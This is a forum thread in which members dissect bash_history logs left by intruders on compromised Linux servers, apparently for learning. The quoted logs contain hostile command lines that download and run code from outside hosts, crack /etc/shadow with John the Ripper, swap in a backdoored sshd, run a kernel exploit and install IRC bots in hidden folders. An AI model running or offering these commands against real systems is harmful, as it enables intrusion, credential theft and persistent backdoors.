Page 1 of 3 123 LastLast
Results 1 to 10 of 24

Thread: THIS is how you hack a web server!

  1. #1
    Senior Member gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177

    THIS is how you hack a web server!

    From: steve@example.org
    To: incidents@securityfocus.com
    Subject: SSH compiled with backdoor

    Hi!

    One of my web servers was hacked on July 17, 2005. bash_history
    showed:

    w
    wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf
    john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd
    ../run;./john /etc/shadow
    wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm
    -rf sshd.tar.gz;cd sshd;cd apps/ssh
    pico genx.h
    pico genx.h
    pico ssh2includes.h
    cd ../..
    ./configure --without-x
    make
    make install
    mkdir /lib/java
    cp /usr/sbin/sshd a
    mv a /lib/java
    rm -rf /usr/sbin/sshd
    cp /usr/local/sbin/sshd /usr/sbin
    /etc/rc.d/init.d/sshd restart
    /etc/rc.d/init.d/ssh restart
    locate init.d
    /etc/init.d/sshd restart
    w
    reboot

    According to john, a couple of users had weak passwords, but root
    seemed well protected. From looking in all the bash_history, it appears the
    hacker came in from the website account, and did an su from there.

    I found this about a month later when I logged into the box, did an ls,
    only to be met by a seg fault. A ps x showed mech.tgz trying to be
    downloaded, and a bunch of other CRON processes running. The auth log
    didn't show other logins, though, so the ssh installed must have logging
    turned off for the backdoor they installed.

    I filled out an abuse form at geocities for the accounts hosting the
    software after downloading the software (I couldn't find the tgz files on
    my system).

    Last showed:
    reboot system boot 2.4.18-bf2.4 Sun Jul 17 18:15
    (37+11:47)
    website pts/0 193.231.77.74 Sun Jul 17 17:42 - down
    (00:27)
    website pts/1 193.231.77.74 Sun Jul 17 17:05 - 17:26
    (00:20)
    website pts/0 211.43.207.169 Sun Jul 17 16:26 - 17:41
    (01:14)

    whois says:
    inetnum: 193.231.77.0 - 193.231.77.255
    netname: DATANET-RO
    descr: Starnets - Datanet
    country: RO
    address: DATA NET
    address: Str. Ioan N. Roman Nr. 13
    address: Constanta, cod 900199, ROMANIA

    Best Regards,

    Steve


    ----------------

  2. #2
    Senior Member gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    **** forgot something:

    I posted this because I thought it was very interesting and it showed a common way to hack a computer running a Unix OS.



    w

    The first command they ran was "w" which was probably to see who was online and if root was sitting at the console or not and OF COURSE check the uptime maybe to take a guess as to when the last reboot was. This helps find an exploit that the machine may not have installed. Though this tech works better on Windows where EVERY patch needs a reboot.


    wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf

    They used wget to grab a file on their own website which was a hacked version of a common application used by admin.


    john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd
    ../run;./john /etc/shadow

    They remove the downloaded file so the admin doesn't find.

    wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm
    -rf sshd.tar.gz;cd sshd;cd apps/ssh
    pico genx.h
    pico genx.h
    pico ssh2includes.h

    Editing the header file.

    cd ../..
    ./configure --without-x
    make
    make install

    Installing the backdoored app.

    mkdir /lib/java
    cp /usr/sbin/sshd a
    mv a /lib/java
    rm -rf /usr/sbin/sshd

    Removing the actual applications to make room for their hacked copy.

    cp /usr/local/sbin/sshd /usr/sbin
    /etc/rc.d/init.d/sshd restart
    /etc/rc.d/init.d/ssh restart
    locate init.d
    /etc/init.d/sshd restart

    A mild **** up

    w

    Check if anyone is going to notice a reboot

    reboot

    Pow.

  3. #3
    AO Senior Cow-beller
    Moderator
    zencoder's Avatar
    Join Date
    Dec 2004
    Location
    Mountain standard tribe.
    Posts
    1,177
    Tight. And it shows it wasn't a script that did this...or if it was, it was interupted and manually completed. I wonder how long that took to do? Reading through it, I feel a sense of urgency for the punk. Not that it matters, really. I don't know about you guys, but if I am so paranoid that I have to run w every few minutes to see whose doing what, I need a beer, a valium, and a new line of work.
    "Data is not necessarily information. Information does not necessarily lead to knowledge. And knowledge is not always sufficient to discover truth and breed wisdom." --Spaf
    Anyone who is capable of getting themselves made president should on no account be allowed to do the job. --Douglas Adams (1952-2001)
    "...people find it far easier to forgive others for being wrong than being right." - Albus Percival Wulfric Brian Dumbledore

  4. #4
    ********** |ceWriterguy
    Join Date
    Aug 2004
    Posts
    1,608
    Yah, looks a bit paranoid, but if you're stealin, you keep looking over your shoulder to see if anyone's watching you. That's how they catch shoplifters in retail. Gotta admit the kid's good, but only if the dl'd file is untraceable (did he goto the library or school computer lab to upload it the first time out?). Else with enough log checking and cooperation he can be found.
    Even a broken watch is correct twice a day.

    Which coder said that nobody could outcode Microsoft in their own OS? Write a bit and make a fortune!

  5. #5
    Yah, looks a bit paranoid, but if you're stealin, you keep looking over your shoulder to see if anyone's watching you.
    I'm such an arrogant egotistical cocky self centered ****er!
    Yeah, we really are 138.

  6. #6
    Senior Member gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    LOL!

    Does this face look almost mean?

  7. #7
    Your face looks like... my ass.
    Ermmm... goatse style.

    Your a sexy man.
    http://crime.about.com/od/history/qt...ords_gracy.htm

  8. #8
    Banned
    Join Date
    May 2003
    Posts
    1,004
    And yet they didn't sanitize the bash_history?

    cheers,

    catch

  9. #9
    Leftie Linux Lover the_JinX's Avatar
    Join Date
    Nov 2001
    Location
    Beverwijk Netherlands
    Posts
    2,534
    I had something allong these lines happen to a box of a friend.. Just a 'toy' linux box..
    An ssh 'knocker' found a weak user (user: print, passwd: print (that's plain stupid))

    A few minutes later came the 'hacker'
    Or should I say lamer.. let's disect..

    .bash_history
    Code:
    w
    passwd
    changed password
    Code:
    w
    cd /var/tmp
    ls
    hostname -f
    mkdir " "
    cd " "
    A nice hard to find folder
    Code:
    ls
    pwd
    wget esteticu.org/mremap_pte
    chmod +x mremap_pte
    ./mremap_pte
    old kernel exploit (ptrace) won't work
    Code:
    w
    rm -rf mremap_pte
    wget www.partyzone.go.ro/hide.tgz
    tar xzvf hide.tgz
    ./hide root 0 0
    Dude.. you arn't root.. that won't work
    Code:
    ls
    rm -rf hide
    rm -rf hide.tgz
    wget ideo.go.ro/psy6667.tgz
    tar xzvf psy6667.tgz
    rm -rf psy6667.tgz
    cd psybnc
    chmod +x psybnc
    mv psybnc backup
    PATH="./"
    backup
    ls
    rm -rf backup
    kilall -9 psybnc
    rm -rf psybnc
    exit
    Ok.. so you installed a irc-bot as a 'normal' user behind a NAT (he could have known this won't work) while you have a valid login (with your own password)..
    Code:
    export PATH='.'
    psybnc
    ls
    exit
    Still won't work
    Code:
    export PATH='.'
    crond
    exit
    I don't get it.. perhaps there is also a 'fake' crond exec in the psybnc package..
    Code:
    ww
    typo
    Code:
    w
    cd /var/tmp
    ls
    cd " "
    ls
    killall -9 psybnc
    rm -rf psbnc
    uname -a
    Should have done that a bit earlier.. could have saved you some time
    Code:
    wget www.skimy.go.ro/psy.tgz
    tar xzvf psy.tgz
    cd psybnc
    sh
    ls
    killall -9 psybnc
    rm -rf psybnc
    rm -rf backup
    cd ..
    ls
    rm -rf psy.tgz
    rm -rf psybnc
    OK he found out such a bot won't work behind a NAT
    Code:
    wget artist.idilis.ro/xpl.tgz
    tar xzvf xpl.tgz
    rm -rf xpl.tgz
    mv mech "..   .bot"
    cd "..   .bot"
    sh
    And that's where the bot send enough mail to trigger the ISP to kill the connection :P

    Leaving the poor 'hacker' disconnected and all the evidence of his mishaps there for us to look at...
    ASCII stupid question, get a stupid ANSI.
    When in Russia, pet a PETSCII.

    Get your ass over to SLAYRadio the best station for C64 Remixes !

  10. #10
    Senior Member Cemetric's Avatar
    Join Date
    Oct 2002
    Posts
    491
    Very nice these disections ... I like 'em for seeing how they do it ... but then again if you get the logs and can see what they did, doesn't that mean they forgot to delete their evidence??.. Like catch said ! So that gets the discussion of how good they are or they just don't care maybe.

    But off course if they did it from a public computer then would the evidence matter ?
    Mmm wait it might if the place were the public computer stands keeps a record of who is using it (by means of driver license etc.. but these can be fake also)... just ranting, never mind

    code:--------------------------------------------------------------------------------ww--------------------------------------------------------------------------------
    I don't think it's a typo ...he got nervous and started to stotter

    C.
    Back when I was a boy, we carved our own IC's out of wood.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •